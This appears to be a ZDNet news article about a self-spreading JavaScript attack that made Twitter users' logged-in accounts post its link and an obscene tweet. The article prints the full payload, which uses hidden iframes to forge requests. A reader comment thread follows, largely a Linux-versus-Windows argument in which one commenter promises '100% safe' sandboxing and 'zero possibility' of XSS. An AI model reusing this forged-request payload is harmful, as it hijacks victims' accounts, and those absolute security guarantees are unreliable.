Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users


Summary: A JavaScript web compromise has apparently affected a large number of Twitter users.


On Sunday afternoon, a large number of Twitter accounts were compromised after their owners were inadvertently lured into viewing the following URL,

http://pastehtml.com/view/1b7xk3b.html

which contains the following Javascript code:

    var el1 = document.createElement('iframe');
    var el2 = document.createElement('iframe');
    el1.style.visibility = "hidden";
    el2.style.visibility = "hidden";
    // The first hidden frame tweets "WTF: <address of this page>" from the
    // visitor's account, which is how the link spreads to their followers.
    el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
    // The second hidden frame posts the obscene message from the same account.
    el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
    // Attaching the frames makes the browser load both update URLs with
    // whatever twitter.com session the visitor is logged into.
    document.getElementsByTagName("body")[0].appendChild(el1);
    document.getElementsByTagName("body")[0].appendChild(el2);

Some of the most prominent Twitter posters with very large follower lists, such as @zee, web cartoonist @oatmeal and tech blogger Robert Scoble (@scobleizer), have been affected, along with hundreds of thousands of their followers who also clicked on the malicious links.

The script causes a Twitter post to appear that directs browsers to execute the Javascript source code, and then posts an embarrassingly obscene message about goats (you can see it in the code snippet above). It appears to affect only certain Windows-based browsers, as I was able to view and execute the source of the page safely using Chrome on Linux, and my own Twitter account was not compromised.

I haven't been able to determine if any Mac or iOS or Android users have been compromised by this exploit yet, so please provide me with an update if you use Safari or another Mac browser or alternative OS and you've been hit.

UPDATE: At 1:49 PM EDT on Sunday, Twitter, on its status blog, notified users that the compromise has been blocked on the new and old versions of the Twitter Web UI and that it is removing all the Tweets which were sent with the cross-site compromise link and the offensive message.

Topics: Security, Browser, Social Enterprise

About

Jason Perlow, Sr. Technology Editor at ZDNet, is a technologist with over two decades of experience integrating large heterogeneous multi-vendor computing environments in Fortune 500 companies. Jason is currently a Partner Technology Strategist with Microsoft Corp. His expressed views do not necessarily represent those of his employer.


Talkback

25 comments
  • Deja Vu all over again. XSS (forgery)

    Seriously,
    How many of you are not running Firefox with Noscript?

    Raise your hand in shame.
    Besides,
    If you are running Ubuntu Linux as I assume Jason runs on his base system, then presumably you are running AppArmor LSM with a profile for Firefox in addition to Noscript.

    If you are just 'this close' to reaching your breaking point with Microsoft Windows and the continual litany of Zero-Day exploits, then, PLEASE, come on ova to my world.

    Once you begin to realize the true 'serenity' of Linux and see that you don't even need an Anti-virus tool (provided you maintain good practices, e.g., stay within the repo system and check SHA-1 sums of programs you download), you can be relatively confident that NOTHING bad will happen as you surf the Internet.

    There's no reason to fear going on the Internet, provided you use Ubuntu Linux, that is.

    Ubuntu Linux: The safest operating system on the Internet.

    I stake my reputation on it.

    P.S. Some of you may not be aware, the AppArmor Firefox profile in Ubuntu Lucid is not enabled by default OOTB.

    You can (and should) enable it with the following command:

    $sudo aa-enforce /etc/apparmor.d/usr.bin.firefox

    Be safe.

    One more thing: XSS is a 'server-side' (Twitter) exploit, not client side, but still, Noscript will keep the script from executing.

    Run your site (as I do) with Plone and you will experience 0 problems with XSS.
    Dietrich T. Schmitz, ~ Your Linux Advocate
    • I was surprised by your post!

      @Dietrich T. Schmitz, Your Linux Advocate
      I knew that at some point someone would turn this story into an anti-MS rant, but I was honestly surprised that it was the very first post!

      [i]$sudo aa-enforce /etc/apparmor.d/usr.bin.firefox[/i]

      How do you enable IE Protected Mode in Windows? Oh. Right. It is on by default. No need for new users to look up the man page for aa-enforce.

      Thanks for your honesty though. You've just admitted that Windows is more secure than Linux out of the box. I always assumed since you made such a fuss about AppArmor that it was on by default. Sorry Dietrich but the rules [b]clearly[/b] state that if something isn't configured by default, it doesn't count. Therefore, AppArmor no longer counts. :(

      [i]How many of you are not running Firefox with Noscript?[/i]

      Not me and I wouldn't recommend it for a second to new users. When I was running Firefox (have since switched to Chrome since I prefer it) I used NoScript and I personally liked it. However, I was savvy enough to know that when a website didn't work properly to check to see if it was because of NoScript. And a [b]lot[/b] of sites didn't work properly. I wouldn't recommend NoScript to new users because it [b]will[/b] give them a poor Internet experience, something they might easily blame on Firefox. Then they might switch back to IE. You wouldn't want that, would you?
      NonZealot
      • Protected-Mode is a hard-coded IE-specific feature

        @NonZealot
        And quite frankly, protected-mode is not a guarantee your Windows machine won't be compromised.
        It gets worse, because now x64 Windows 7 can be exploited by the TDL3 rootkit:
        http://www.prevx.com/blog/154/TDL-rootkit-x-goes-in-the-wild.html
        Now, that's nasty.

        I will tell you that Linux can get rooted but not if you download apps only from your repository and if you sandbox your App be it Evolution (email), Firefox (browser), Evince (PDF reader) with AA, you are 100% safe from any kind of exploit.

        That is my assurance--100% safe from exploit.

        Because Windows doesn't offer LSM sandboxing technology, it is a bucket with holes in the bottom.

        Now, NZ, did you think your argument would work?
        There is no arguing the point:

        Microsoft has not seen fit to provide an LSM mechanism to support any and all Apps in need of sandboxing.

        Yet, they continue to feather their own nest by offering sandboxing for Office 2010. That is more than a bit troubling.

        As for your beloved Chrome, their Google Engineers have come straight out and written their own 'caveats' regarding sandboxing:

        http://dev.chromium.org/developers/design-documents/sandbox#TOC-Other-caveats

        Other caveats

        "The operating system might have bugs. Of interest are bugs in the Windows API that allow the bypass of the regular security checks. If such a bug exists, malware will be able to bypass the sandbox restrictions and broker policy and possibly compromise the computer. Under Windows, there is no practical way to prevent code in the sandbox from calling a system service.

        In addition, third party software, particularly anti-malware solutions, can create new attack vectors. The most troublesome are applications that inject dlls in order to enable some (usually unwanted) capability. These dlls will also get injected in the sandbox process. In the best case they will malfunction, and in the worst case can create backdoors to other processes or to the file system itself, enabling specially crafted malware to escape the sandbox."

        Linux partitions the kernel functions from LSM MAC functions in AppArmor or SELinux.

        As such LSMs have an added security advantage in that they police both the 'App' (Internet-facing App) and the Kernel.

        Not so with Windows 7. Google above even offers a 'disclaimer' that their sandbox is only as good as the underlying kernel. Injected dlls were given as an example of how the sandbox might become compromised.

        So, good luck with your Windows bucket. It doesn't matter *what* you run on it. It has security holes--big ones.

        Ubuntu Linux: The safest operating system on the Planet.

        I stake my reputation on it.
        Dietrich T. Schmitz, ~ Your Linux Advocate
      • Sorry DTS but none of that counts

        If it isn't enabled by default, it doesn't count. AppArmor no longer counts. Have a nice day!
        NonZealot
        • Well, I can see where you might wish that were so

          @NonZealot
          since you really have no counter-argument--you are being arbitrary in discounting the importance of AA.

          Of course, the FF profile is present OOTB on every Ubuntu install but Canonical chose not to have it enabled by default as many folks would find that some of their plugins would simply not work. Now, as for myself, I can 'train' any plugin to work with AA in a few minutes, but that may be beyond the ability of your average user.

          I have found that the FF profile works OOTB for all of the plugins I use: Ubiquity, Sync, Noscript, Adblock, Nightly Tester Tools, Firebug.

          For example, AA stops clicking on links (like magnet links) from spawning a child process (your favorite torrent tool, e.g., deluge). But putting the profile into 'complain' mode for just a few minutes to train AA takes care of that.

          And AA is running OOTB on Ubuntu on many processes--just not FF by default.

          So, you really have no arguments for the purpose of discussing why Microsoft doesn't have LSM which would be of tremendous benefit in stopping zero-day exploits.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • Like I said, AppArmor no longer counts

        Out of the box, Windows has better sandboxing than Linux does. Sure, you can [b]add[/b] sandboxing to Firefox should you just happen to know about the aa-enforce command and you know where Firefox's AppArmor configuration is but the average user won't know any of this and will simply use Firefox believing that they are protected. But they aren't.

        [i]Canonical chose not to have it enabled by default as many folks would find that some of their plugins would simply not work[/i]

        Wow, this is getting better and better!!! So even if you [b]do[/b] happen to know about aa-enforce, it will break your browser? Fantastic!!! Protected Mode doesn't break IE.

        I'm glad to hear that after running a command line executable and "training" it to recognize your plug-ins, you feel that you are safe. This is all fine and good but MS recognizes that 99.9% of users won't do this. MS's solution, since it is on by default, is therefore superior to Linux's solution, which requires command line executables, parameters, and training to use.
        NonZealot
        • So much for reading comprehension.

          @NonZealot
          Windows protected-mode is a 'one-app' security feature that has been proven to not work (root kit 64-bit).

          Users and sys admins alike have no recourse in sandboxing their third-party apps--they are left 'out in the cold' by Microsoft who have seen fit however to 'feather their own nest', namely Office 2010 *does* sandbox its apps.

          So, stop deluding yourself. Linux offers LSM and that's the key security differentiator that qualifies Ubuntu Linux as 'the safest operating system on the planet'.

          You have no argument for that.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • You are wrong

        [i]Linux offers LSM[/i]

        Nope, it doesn't count because it isn't on by default. And when you [b]do[/b] turn it on, it breaks your browser, causing the end user to turn it off again.

        Those are the rules. Sorry DTS, I didn't make them up, you ABMers did. Now you have to live with those rules.
        NonZealot
        • Doesn't break the browser

          @NonZealot
          Technically, if you open /var/log/messages, you'd see an auditd permission-denial, but from the user's perspective trying to spawn an app as a child process will be silently denied.

          And that's all. Firefox will function fine. But I wouldn't expect you to know that because you haven't even given AA a full evaluation.

          But that's alright NZ, be happy with mediocrity and an operating system that is defective because that is what the masses get with Microsoft Windows.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • Thanks! I AM happy! As are hundreds of millions of others

        [i]be happy with mediocrity and an operating system that is defective because that is what the masses get with Microsoft Windows[/i]

        There are more happy Windows users than there are desktop Linux users total!

        [i]but from the user's perspective[/i]

        From the user's perspective, they try to interact with their add-on and nothing happens. No error message. No clue as to why their request was denied by the OS. Nothing happens. And you say desktop Linux has less than 1% marketshare? I can't for the life of me figure that one out!!!
        NonZealot
        • And tomorrow you will have more zero-day exploits

          @NonZealot

          to face--none of which you will be able to do anything about.

          Have fun.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • I suppose it is possible

        [i]And tomorrow you will have more zero-day exploits[/i]

        Possibly. Haven't been hit by any yet though so I'll panic when there is a need to panic. That need hasn't arisen yet but I'll let you know when it does!

        [i]none of which you will be able to do anything about[/i]

        Oh, exactly like a desktop Linux user who didn't run your little aa-enforce program because running that breaks your browser! Hard to get hit by an exploit if the program used in the exploit is unusable! :)
        NonZealot
        • Firefox is not unusable

          @NonZealot
          It's just that what isn't *defined* in the AA profile will be denied by AA. That simple.

          It only takes a few minutes to update the profile and you are good to go (go into 'complain mode' and use FF for the task that is blocked, then set to enforced).

          But of course, you will continue to confuse the issue.
          That's ok.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • RE: Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

        @NonZealot

        This is a problem the security community, including the author of NoScript, has yet to seriously address.

        What is more, NoScript works by ripping out suspicious Javascript (and other scripts). But this results in a lot of Javascript error messages in the console, errors that do not occur when the same site is viewed w/o NoScript. So NoScript is breaking the Javascript itself.

        Of course that leads to a poor Internet experience. But no one else IS addressing the security need, so if you ever use that same computer for a sensitive task, such as home banking or connecting to your E*trade account online, then run it anyway.
        mejohnsn
        • It is a server side issue

          @mejohnsn
          You are correct in that Noscript attempts to excise the offending XSS code, but it is indeed the server that accepts (and does nothing to stop it) injected javascript and executes it as if it were its own code.

          That's why I personally switched to Plone for my site.
          There is zero possibility for XSS with Plone.
          Plone Security overview:
          http://plone.org/products/plone/security/overview

          If the CIA, FBI and Nasa use it, that's good enough for me.

          Plone runs rings around Microsoft Sharepoint.
          Plone: The best (and safest) CMS on the Planet.

          I stake my reputation on it.
          Dietrich T. Schmitz, ~ Your Linux Advocate
    • RE: Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

      @Dietrich T. Schmitz, Your Linux Advocate

      Yup, get out a clay tablet and stick (Linux) and you'll be safe forever (until it gets pwned once again by a bored hacker). However, the rest of us actually use our computers.

      I know a safer way - don't use Twitter ;-)
      tonymcs1
      • RE: Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

        @tonymcs@...

        How long will the two of you fanboys keep talking past each other? DTS clearly doesn't get why AppArmor turned off by default is a non-starter, but you clearly don't get why having security on by default is worthless if that security is already broken.
        mejohnsn
        • AA is not turned off by default. The profile for FF is.

          @mejohnsn
          nt
          Dietrich T. Schmitz, ~ Your Linux Advocate
    • RE: Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

      @Dietrich T. Schmitz, Your Linux Advocate
      Here are just a few of the out in the wild exploits for Linux
      http://insecure.org/sploits_linux.html
      rparker009
  • What's happening with Twitter?

    Twitter is being regularly pwned by amateurs. Amazing.

    That's some real awful and inefficient JavaScript code you got there. Obviously written by an amateur.

    All it takes to pwn twitter is an amateur, that speaks volumes about the quality of the code that runs twitter.
    OS Reload